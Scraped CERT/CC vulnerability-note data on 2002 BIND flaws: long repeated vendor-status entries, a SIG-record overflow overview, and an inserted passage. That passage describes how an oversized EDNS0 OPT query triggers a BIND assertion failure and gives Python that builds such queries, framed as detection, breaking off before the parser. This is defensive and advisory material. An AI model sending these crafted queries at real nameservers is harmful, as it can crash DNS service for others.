Feedback>).\n\n### GNU glibc Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Heimdal Kerberos Project Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor 
Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### InfoBlox Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Intel Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### InterSoft International Inc. 
Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Interlink Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Juniper Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### KTH Kerberos Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this 
time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Lachman Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Lotus Software Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Lucent Technologies Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### MIT Kerberos Development Team Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement 
from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Macromedia Inc. Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Madgoat Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### MandrakeSoft Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 
Feedback>).\n\n### Men&Mice Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### MetaSolv Software Inc. Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Microsoft Corporation Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Multinet Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC 
has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### NCFTP Software Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### NCSA Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### NEC Corporation Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### NET-SNMP Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a 
statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### NeXT Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### NetBSD Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Network Appliance Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 
Feedback>).\n\n### Nixu Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Nokia Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Nortel Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Open Group Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments 
at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### OpenBSD Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### OpenSSH Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Oracle Corporation Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the 
vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Putty Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### RADIUSClient Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### RSA Security Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### 
Riverstone Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### SGI Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Sendmail Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Sequent Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this 
time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Sequent Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### ShadowSupport Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Sony Corporation Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Sophos Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### 
Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### SuSE Inc. Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Sun Microsystems Inc. Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Symantec Corporation Unknown\n\nNotified: November 12, 2002 Updated: April 01, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 
Feedback>).\n\n### The SCO Group (SCO Linux) Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Threshold Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Trend Micro Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Unisys Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC 
has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Wind River Systems Inc. Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Wirex Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### XTRADIUS Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Xi Graphics Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received 
a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### YARD RADIUS Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### iPlanet Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21469>\n * <http://www.isc.org/products/BIND/bind-security.html>\n * <http://www.ciac.org/ciac/bulletins/n-013.shtml>\n\n### Acknowledgements\n\nInternet Security Systems is credited for discovering this vulnerability.\n\nThis document was written by Ian A 
Finlay.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2002-1220](<http://web.nvd.nist.gov/vuln/detail/CVE-2002-1220>) \n---|--- \n**CERT Advisory:** | [CA-2002-31 ](<http://www.cert.org/advisories/CA-2002-31.html>) \n**Severity Metric:** | 33.05 \n**Date Public:** | 2002-11-12 \n**Date First Published:** | 2002-11-13 \n**Date Last Updated: ** | 2003-05-30 17:06 UTC \n**Document Revision: ** | 27 \n", "modified": "2003-05-30T17:06:00", "published": "2002-11-13T00:00:00", "id": "VU:229595", "href": "https://www.kb.cert.org/vuls/id/229595", "type": "cert", "title": "Overly large OPT record assertion", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-09-18T20:44:28", "bulletinFamily": "info", "cvelist": ["CVE-2002-1219", "CVE-2002-1220", "CVE-2002-1221"], "description": "### Overview \n\nA vulnerability in BIND allows remote attackers to execute code with the privileges of the process running _named_. This vulnerability is resolved in BIND versions 4.9.11, 8.2.7, 8.3.4, and BIND 9.\n\n### Description \n\nA remotely exploitable buffer overflow exists in _named_. An attacker using malformed SIG records can exploit this vulnerability against a nameserver with recursion enabled. The overflow occurs when the nameserver constructs responses to recursive requests using the malformed SIG records, leading to arbitrary code execution as the _named_ uid, typically root. As was the case with a previous issue affecting _named_ and NXT records ([CA-1999-14](<http://www.cert.org/advisories/CA-1999-14.html>), [VU#16532](<http://www.kb.cert.org/vuls/id/16532>)), a malicious server must reply to a forwarded request from a recursive nameserver in order to exploit the vulnerability. However, as with the NXT record exploit, a full-service nameserver is not required, only a service replying to a legitimate victim nameserver request. 
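The three ISS findings share one attack surface, the recursive resolver, but differ in how they are reached: the SIG overflow above needs a malicious authoritative server to answer a forwarded query, while the OPT assertion failure (CVE-2002-1220, the subject of this page) is reached by a plain client query for a nonexistent subdomain that carries an EDNS0 OPT record advertising a large UDP payload size. What a practitioner in front of a BIND 8 resolver wants is a way to spot such queries in a capture. The following is an added example, written for this page and not code from ISC, ISS or the CERT/CC: it builds DNS queries with and without an OPT record (sample packets constructed inline, not captured traffic), parses the OPT record from the raw message and returns the advertised payload size. The 4096-byte flagging threshold and the query name `does-not-exist.example.com` are assumptions for the example; nothing here is sent on the network.

```python
"""Extract the EDNS0 OPT UDP payload size from a raw DNS query (RFC 2671 wire
layout) and flag oversized advertisements.

Added example for detection and triage; not code from ISC, ISS or CERT/CC.
Sample queries below are constructed inline (not captured traffic). The
4096-byte threshold is an assumption chosen to separate ordinary EDNS0
clients from the large payload sizes the advisories describe.
"""
import struct
from typing import Optional

OPT_TYPE = 41
LARGE_PAYLOAD_THRESHOLD = 4096  # assumption: flag anything above this


def encode_name(name: str) -> bytes:
    """Wire-encode a DNS name as length-prefixed labels ending in a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        if not label:
            continue
        raw = label.encode("ascii")
        if len(raw) > 63:
            raise ValueError("label too long")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_query(qname: str, qtype: int = 1, udp_payload: Optional[int] = None,
                txid: int = 0x1234) -> bytes:
    """Build a standard recursive query. When udp_payload is given, append an
    EDNS0 OPT RR whose CLASS field carries the advertised UDP payload size."""
    arcount = 1 if udp_payload is not None else 0
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, arcount)  # RD set
    question = encode_name(qname) + struct.pack("!HH", qtype, 1)   # IN class
    pkt = header + question
    if udp_payload is not None:
        # OPT RR: NAME=root (0x00), TYPE=41, CLASS=payload size,
        # TTL=extended RCODE/version/flags (0), RDLENGTH=0 (no options)
        pkt += b"\x00" + struct.pack("!HHIH", OPT_TYPE, udp_payload, 0, 0)
    return pkt


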